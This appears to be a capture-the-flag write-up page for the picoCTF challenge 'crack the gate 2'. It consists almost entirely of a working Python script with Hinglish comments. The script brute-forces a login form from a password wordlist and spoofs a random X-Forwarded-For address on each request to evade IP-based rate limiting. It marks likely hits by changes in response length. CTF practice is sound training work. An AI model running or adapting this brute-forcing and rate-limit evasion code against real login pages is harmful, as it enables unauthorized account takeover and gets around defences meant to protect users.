crack the gate 2
Last updated
Was this helpful?
⌘Ctrlk
Last updated
Was this helpful?
Was this helpful?
import requests
import random
TARGET = "http://amiable-citadel.picoctf.net:62476/login" # <- tera port
PASSWORD_FILE = "/home/kali/Downloads/passwords.txt"
EMAIL = "ctf-player@picoctf.org"
TIMEOUT = 10
def rand_ip():
return "{}.{}.{}.{}".format(
random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254),
random.randint(1, 254)
)
session = requests.Session()
session.headers.update({
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
"AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/125.0.6422.60 Safari/537.36"
})
base_len = None
with open(PASSWORD_FILE, "r", encoding="utf-8", errors="ignore") as fh:
for i, line in enumerate(fh, start=1):
pwd = line.strip()
if not pwd:
continue
ip = rand_ip()
headers = {
"X-Forwarded-For": ip
}
data = {
"email": EMAIL,
"password": pwd
}
try:
# agar site JSON chahti ho to:
# r = session.post(TARGET, json=data, headers=headers, timeout=TIMEOUT, allow_redirects=True)
r = session.post(TARGET, data=data, headers=headers,
timeout=TIMEOUT, allow_redirects=True)
status = r.status_code
length = len(r.content)
if base_len is None:
base_len = length
print(f"[{i}] {pwd} | status={status} | len={length}")
# Agar response length alag hai to highlight kar:
if length != base_len:
print(f" >>> POSSIBLE HIT for password: {pwd}")
# yaha optionally r.text print kar sakta hai dekhne ke liye:
# print(r.text)
# break
except requests.RequestException as e:
print(f"Error on {pwd}: {e}")